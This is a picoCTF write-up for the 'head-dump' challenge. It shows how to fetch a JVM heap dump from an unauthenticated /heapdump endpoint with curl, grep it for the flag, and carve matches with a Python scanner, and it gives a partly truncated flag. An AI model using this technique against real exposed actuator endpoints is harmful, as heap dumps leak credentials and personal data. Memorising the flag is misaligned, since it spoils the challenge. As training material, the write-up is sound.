head-dump

Published: April 2, 2025
Updated: December 9, 2025

Description

The picoCTF News blog exposes an API reference that includes a /heapdump endpoint. Download the Java heap dump and search it for picoCTF.

Navigate to the API Documentation article and scroll to the entry describing /heapdump.

Use the built-in “Try it out” or run curl manually to download the heap dump file.

curl http://verbal-sleep.picoctf.net:63972/heapdump -o heapdump
grep -a picoCTF heapdump

Solution

  1. Step 1: Hit the hidden endpoint
    The open actuator endpoint dumps the JVM heap (`/heapdump`). Requesting it returns megabytes of binary data.
  2. Step 2: Search the dump
    Use `grep -a picoCTF heapdump` (or `strings`) to carve the flag string out of the heap. It appears near a JSON blob describing patient records.
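As an added example (not part of the original write-up), here is a small Python scan that does what steps 1 and 2 do by hand, with two things `grep -a` does not give you: it checks the HPROF magic first, so an HTML error page is not mistaken for a dump, and it reports each match's file offset plus the printable bytes around it, so you can see the JSON record the string sits in. The sample dump bytes and the flag value in it are constructed for this example.

```python
import re
import sys

# HPROF heap dumps start with one of these magic strings (a known file-format fact).
HPROF_MAGICS = (b"JAVA PROFILE 1.0.1\0", b"JAVA PROFILE 1.0.2\0")
# Bounded flag pattern; a NUL inside the braces would mean we ran into unrelated bytes.
FLAG_RE = re.compile(rb"picoCTF\{[^}\x00]{1,120}\}")

# Constructed sample dump (not real data): HPROF header, binary filler, then a
# JSON-looking record holding a flag-shaped string, as the write-up describes.
SAMPLE_DUMP = (
    b"JAVA PROFILE 1.0.2\0" + b"\x00\x00\x00\x08" + b"\x00" * 12
    + b"\x01\x02\xff\xfe" * 8
    + b'{"patient":"Jane Doe","note":"picoCTF{fake_flag_for_example_only}"}'
    + b"\x00\x07\x00" * 10
)


def is_hprof(data: bytes) -> bool:
    """True if the bytes carry an HPROF header, i.e. we fetched a real heap dump."""
    return data.startswith(HPROF_MAGICS)


def carve_flags(data: bytes, context: int = 32) -> list:
    """Find every flag-shaped string and report its offset plus printable context."""
    hits = []
    for m in FLAG_RE.finditer(data):
        lo, hi = max(0, m.start() - context), min(len(data), m.end() + context)
        # Replace non-printable bytes with '.' so the context is readable.
        window = bytes(b if 32 <= b < 127 else 0x2E for b in data[lo:hi])
        hits.append({
            "offset": m.start(),
            "flag": m.group().decode("ascii", "replace"),
            "context": window.decode("ascii"),
        })
    return hits


def scan(data: bytes) -> list:
    """Refuse non-HPROF input (an HTML error page, say) before carving."""
    if not is_hprof(data):
        raise ValueError("not an HPROF heap dump: check the download")
    return carve_flags(data)


if __name__ == "__main__":
    # Usage: python scan.py heapdump   (falls back to the constructed sample)
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_DUMP
    for hit in scan(blob):
        print(f"offset 0x{hit['offset']:x}: {hit['flag']}\n    ...{hit['context']}...")
```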

Flag

picoCTF{Pat!3nt_15_Th3_K3y_ad7e...}

No authentication or decoding needed; just download and search the dump.